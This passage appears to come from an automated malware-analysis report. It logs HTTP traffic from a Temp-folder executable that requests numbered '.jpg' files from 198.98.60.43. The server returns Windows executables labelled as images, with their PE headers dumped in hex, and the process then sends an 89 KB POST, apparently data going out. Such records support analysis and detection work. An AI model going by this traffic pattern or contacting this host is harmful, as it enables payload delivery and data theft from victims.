02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
                                                                May 4, 2021 21:35:07.735249043 CEST1603OUTPOST /4.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:07.863147020 CEST1604INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:07 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT
                                                                ETag: "6b738-58aa826952280"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440120
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                May 4, 2021 21:35:08.911489964 CEST2070OUTPOST /5.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:09.039388895 CEST2072INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:08 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT
                                                                ETag: "1303d0-58aa8276ac200"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1246160
                                                                Keep-Alive: timeout=5, max=95
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                May 4, 2021 21:35:12.461482048 CEST3431OUTPOST /7.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.589014053 CEST3488INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT
                                                                ETag: "14748-58aa8287d6a80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 83784
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
                                                                May 4, 2021 21:35:14.873209953 CEST4632OUTPOST /main.php HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:15.003655910 CEST4659INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:14 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                X-Powered-By: PHP/7.2.24
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                May 4, 2021 21:35:15.744862080 CEST5273OUTPOST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 89104
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                May 4, 2021 21:35:16.350888014 CEST5760INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:15 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                X-Powered-By: PHP/7.2.24
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.2249167198.98.60.4380C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 4, 2021 21:35:12.091762066 CEST3388OUTPOST /6.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.219115019 CEST3390INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT
                                                                ETag: "235d0-58aa827e4d400"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 144848
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
                                                                May 4, 2021 21:35:12.622164011 CEST3555OUTPOST /1.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:12.750000954 CEST3585INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:12 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT
                                                                ETag: "9d9d8-5562373312d00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 645592
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
